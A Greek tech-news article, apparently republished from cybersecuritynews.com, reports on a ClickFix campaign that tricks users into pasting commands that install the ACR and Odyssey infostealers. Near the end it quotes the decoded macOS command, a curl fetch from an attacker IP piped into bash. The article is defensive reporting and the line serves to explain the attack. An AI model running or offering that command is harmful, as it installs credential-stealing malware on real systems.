Close Menu
TechReport.grTechReport.gr

    Subscribe to Updates

    Get the latest creative news from FooBar about art, design and business.

    What's Hot

    Νέα επίθεση ClickFix που στοχεύει χρήστες Windows και macOS για ανάπτυξη κακόβουλου λογισμικού Infostealer

    14 Νοεμβρίου 2025

    Η εφαρμογή Android Photo Frames λαμβάνει κακόβουλο λογισμικό, παρέχοντας στους χάκερ τον έλεγχο της συσκευής χωρίς αλληλεπίδραση με τον χρήστη

    14 Νοεμβρίου 2025

    Οι πλήρεις προδιαγραφές του Honor 500 Pro εμφανίστηκαν πριν από την επίσημη κυκλοφορία

    14 Νοεμβρίου 2025
    Facebook X (Twitter) Instagram
    • Home
    • Πολιτική απορρήτου
    • Σχετικά με εμάς
    • Contact With TechReport
    • Greek Live Channels IPTV 2025
    Facebook X (Twitter) Instagram Pinterest Vimeo
    TechReport.grTechReport.gr
    • Phones
      • iPhone – iOS
      • Android
      • Samsung
    • Computer
    • Internet
      • Security
    • Entertainment
      • Gaming
    • Business
    • Cryptos
    • Gadgets
    • Technology
      • Science
      • Reviews
      • How-To
    • Health
      • Psychology
    TechReport.grTechReport.gr
    Αρχική » Νέα επίθεση ClickFix που στοχεύει χρήστες Windows και macOS για ανάπτυξη κακόβουλου λογισμικού Infostealer
    Security

    Νέα επίθεση ClickFix που στοχεύει χρήστες Windows και macOS για ανάπτυξη κακόβουλου λογισμικού Infostealer

    Marizas DimitrisBy Marizas Dimitris14 Νοεμβρίου 2025Δεν υπάρχουν Σχόλια3 Mins Read
    Share Facebook Twitter Pinterest LinkedIn Tumblr Reddit Telegram Email
    Share
    Facebook Twitter LinkedIn Pinterest Email


    Μια αυξανόμενη τεχνική κοινωνικής μηχανικής που ονομάζεται ClickFix έχει αναδειχθεί ως μία από τις πιο επιτυχημένες μεθόδους για τη διανομή κακόβουλου λογισμικού τους τελευταίους μήνες.

    Αυτή η επίθεση εξαπατά τους χρήστες να αντιγράψουν και να εκτελέσουν εντολές απευθείας στη διεπαφή γραμμής εντολών του λειτουργικού τους συστήματος, εγκαθιστώντας τελικά επικίνδυνο λογισμικό κλοπής πληροφοριών.

    Η τεχνική έχει αποδειχθεί εξαιρετικά αποτελεσματική επειδή παρακάμπτει τις παραδοσιακές λύσεις ασφάλειας email και λειτουργεί μέσα σε περιβάλλοντα δοκιμών του προγράμματος περιήγησης όπου τα περισσότερα εργαλεία ασφαλείας δεν μπορούν να εντοπίσουν την κακόβουλη δραστηριότητα.

    Η επίθεση συνήθως ξεκινά όταν οι χρήστες αναζητούν σπασμένο λογισμικό μέσω των μηχανών αναζήτησης. Οι εγκληματίες του κυβερνοχώρου δημιουργούν ψεύτικες σελίδες προορισμού που φιλοξενούνται σε αξιόπιστες πλατφόρμες όπως το Google Colab, το Drive, οι Ιστότοποι και οι Ομάδες για να αποφύγουν τον αποκλεισμό τους από συστήματα ασφαλείας.

    Αυτές οι σελίδες λειτουργούν ως αρχικά σημεία επαφής που ανακατευθύνουν τα θύματα με βάση το λειτουργικό τους σύστημα. Οι χρήστες των Windows λαμβάνουν το ACR stealer, ενώ οι χρήστες macOS ανακατευθύνονται σε σελίδες που αναπτύσσουν το Odyssey infostealer.

    Ερευνητές ασφαλείας Intel471 αναγνωρισθείς αυτή την καμπάνια τον Ιούνιο του 2025 κατά τη διάρκεια ενεργειών κυνηγιού κακόβουλου λογισμικού.

    Η έρευνα αποκάλυψε ότι οι παράγοντες απειλών στόχευαν με επιτυχία και τα δύο μεγάλα λειτουργικά συστήματα μέσω μιας ενιαίας υποδομής.

    Αλυσίδα μόλυνσης (Πηγή - Intel471)
    Αλυσίδα μόλυνσης (Πηγή – Intel471)

    Αυτό που κάνει αυτή την επίθεση ιδιαίτερα ανησυχητική είναι η εκτέλεσή της χωρίς αρχεία. Όταν τα θύματα επικολλούν τις εντολές, τα κακόβουλα ωφέλιμα φορτία έλκονται απευθείας στη μνήμη, καθιστώντας τα αόρατα στο παραδοσιακό λογισμικό ασφαλείας.

    Μηχανισμός Λοιμώξεων και Τεχνική Εκτέλεση

    Για τους χρήστες των Windows, η αλυσίδα επίθεσης καθοδηγεί τα θύματα σε πολλά σημεία ανακατεύθυνσης πριν φτάσουν σε μια σελίδα φιλοξενίας αρχείων MEGA που περιέχει ένα αρχείο ZIP που προστατεύεται με κωδικό πρόσβασης.

    Μέσα σε αυτό το αρχείο βρίσκεται ο κλέφτης ACR μεταμφιεσμένος ως setup.exe. Το κακόβουλο λογισμικό όχι μόνο κλέβει διαπιστευτήρια και προσωπικά δεδομένα, αλλά χρησιμεύει και ως φορτωτής, εγκαθιστώντας πρόσθετες απειλές, όπως το SharkClipper, έναν αεροπειρατή προχείρου κρυπτονομισμάτων.

    Ψεύτικος έλεγχος ασφαλείας Cloudflare που προτρέπει τους χρήστες να εκτελέσουν μια εντολή ClickFix (Πηγή - Intel471)
    Fake έλεγχος ασφαλείας Cloudflare που προτρέπει τους χρήστες να εκτελέσουν μια εντολή ClickFix (Πηγή – Intel471)

    Οι χρήστες MacOS αντιμετωπίζουν μια διαφορετική προσέγγιση που περιλαμβάνει μια ψεύτικη σελίδα ελέγχου ασφαλείας Cloudflare. Όταν οι χρήστες προσπαθούν να αντιγράψουν αυτό που φαίνεται να είναι μια συμβολοσειρά επαλήθευσης, στην πραγματικότητα αντιγράφουν μια εντολή κελύφους με κωδικοποίηση Base64.

    Μόλις αποκωδικοποιηθεί, αυτή η εντολή εκτελεί:

    curl - s http://45.135.232.33/droberto39774 | nohup bash

    Αυτή η εντολή κατεβάζει και εκτελεί σιωπηλά το Odyssey stealer, το οποίο συλλέγει κωδικούς πρόσβασης, cookie, πορτοφόλια κρυπτονομισμάτων, Apple Notes, καταχωρήσεις Keychain και δεδομένα συστήματος και, στη συνέχεια, συμπιέζει τα πάντα στο out.zip για εξαγωγή.



    VIA: cybersecuritynews.com

    Related Posts


    Το πρόγραμμα περιήγησης Tor 15.0.1 κυκλοφόρησε με επιδιόρθωση για πολλαπλά τρωτά σημεία ασφαλείας
    Security

    Το Chrome διορθώνει ευπάθεια υλοποίησης υψηλής σοβαρότητας στη μηχανή JavaScript V8
    Security

    Οι χάκερ οπλίζουν το AppleScript για να παραδώσουν δημιουργικά κακόβουλο λογισμικό macOS Mimic ως ενημερώσεις Zoom/Teams
    Security
    apple Google macOS Windows ασφάλεια στον κυβερνοχώρο νέα για την ασφάλεια στον κυβερνοχώρο
    Share. Facebook Twitter Pinterest LinkedIn Tumblr Email
    Previous ArticleΗ εφαρμογή Android Photo Frames λαμβάνει κακόβουλο λογισμικό, παρέχοντας στους χάκερ τον έλεγχο της συσκευής χωρίς αλληλεπίδραση με τον χρήστη
    Marizas Dimitris
    • Website
    • Facebook

    Ο Δημήτρης είναι παθιασμένος με την τεχνολογία και τις καινοτομίες της Samsung. Αγαπά να εξερευνά νέες ιδέες, να λύνει προβλήματα και να μοιράζεται τρόπους που κάνουν την τεχνολογία πιο ανθρώπινη και απολαυστική.

    Related Posts

    Security

    Η εφαρμογή Android Photo Frames λαμβάνει κακόβουλο λογισμικό, παρέχοντας στους χάκερ τον έλεγχο της συσκευής χωρίς αλληλεπίδραση με τον χρήστη

    14 Νοεμβρίου 2025
    Security

    Το DoorDash επλήγη από νέα παραβίαση δεδομένων τον Οκτώβριο, εκθέτοντας πληροφορίες χρήστη

    14 Νοεμβρίου 2025
    Security

    Αξιοποίηση κρίσιμης ευπάθειας Fortinet FortiWeb στη φύση για τη δημιουργία λογαριασμών διαχειριστή

    14 Νοεμβρίου 2025
    Add A Comment
    Leave A Reply Cancel Reply

    Top Posts

    Οδηγός για το Πρόγραμμα «Ψηφιακές Συναλλαγές Β’» (2025) – Όσα πρέπει να γνωρίζουμε

    13 Νοεμβρίου 20251.152 Views

    Ο διαλογισμός έχει επικίνδυνες παρενέργειες. Τι λένε οι επιστήμονες;

    30 Οκτωβρίου 2025567 Views
    Αλλάζω Σύστημα Θέρμανσης και Θερμοσίφωνα οδηγός

    Αλλάζω Σύστημα Θέρμανσης και Θερμοσίφωνα: Πλήρης Οδηγός για 100.000 Νέους Δικαιούχους

    12 Νοεμβρίου 2025465 Views
    Stay In Touch
    • Facebook
    • YouTube
    • TikTok
    • WhatsApp
    • Twitter
    • Instagram
    Latest News
    Security

    Νέα επίθεση ClickFix που στοχεύει χρήστες Windows και macOS για ανάπτυξη κακόβουλου λογισμικού Infostealer

    Marizas Dimitris14 Νοεμβρίου 2025
    Security

    Η εφαρμογή Android Photo Frames λαμβάνει κακόβουλο λογισμικό, παρέχοντας στους χάκερ τον έλεγχο της συσκευής χωρίς αλληλεπίδραση με τον χρήστη

    Marizas Dimitris14 Νοεμβρίου 2025
    Huawei News

    Οι πλήρεις προδιαγραφές του Honor 500 Pro εμφανίστηκαν πριν από την επίσημη κυκλοφορία

    Marizas Dimitris14 Νοεμβρίου 2025
    Most Popular

    Οδηγός για το Πρόγραμμα «Ψηφιακές Συναλλαγές Β’» (2025) – Όσα πρέπει να γνωρίζουμε

    13 Νοεμβρίου 20251.152 Views

    Ο διαλογισμός έχει επικίνδυνες παρενέργειες. Τι λένε οι επιστήμονες;

    30 Οκτωβρίου 2025567 Views
    Αλλάζω Σύστημα Θέρμανσης και Θερμοσίφωνα οδηγός

    Αλλάζω Σύστημα Θέρμανσης και Θερμοσίφωνα: Πλήρης Οδηγός για 100.000 Νέους Δικαιούχους

    12 Νοεμβρίου 2025465 Views
    About TechReport.gr

    Το TechReport.gr ιδρύθηκε με στόχο να αποτελέσει την πρώτη πηγή ενημέρωσης για όσους αναζητούν αξιόπιστη και εμπεριστατωμένη κάλυψη του τεχνολογικού κόσμου. Από την αρχή της λειτουργίας του, το site έχει δεσμευτεί στην παροχή ποιοτικού περιεχομένου που συνδυάζει ενημέρωση, ανάλυση και πρακτικές συμβουλές.
    • Email: [email protected]
    • Phone: +30 6980 730 713
    Copyright © 2025| TechReport.gr | A project by: Δημήτρης Μάριζας
    Λογότυπα, επωνυμίες, εμπορικά σήματα και γνωρίσματα ανήκουν στους νόμιμους ιδιοκτήτες.

    Our Picks

    Νέα επίθεση ClickFix που στοχεύει χρήστες Windows και macOS για ανάπτυξη κακόβουλου λογισμικού Infostealer

    14 Νοεμβρίου 2025

    Η εφαρμογή Android Photo Frames λαμβάνει κακόβουλο λογισμικό, παρέχοντας στους χάκερ τον έλεγχο της συσκευής χωρίς αλληλεπίδραση με τον χρήστη

    14 Νοεμβρίου 2025

    Οι πλήρεις προδιαγραφές του Honor 500 Pro εμφανίστηκαν πριν από την επίσημη κυκλοφορία

    14 Νοεμβρίου 2025
    Facebook X (Twitter) Instagram Pinterest
    • Home
    • Technology
    • Gaming
    • Phones
    • Buy Now
    © 2025 TechBit.gr Designed and Developed by Dimitris Marizas.

    Type above and press Enter to search. Press Esc to cancel.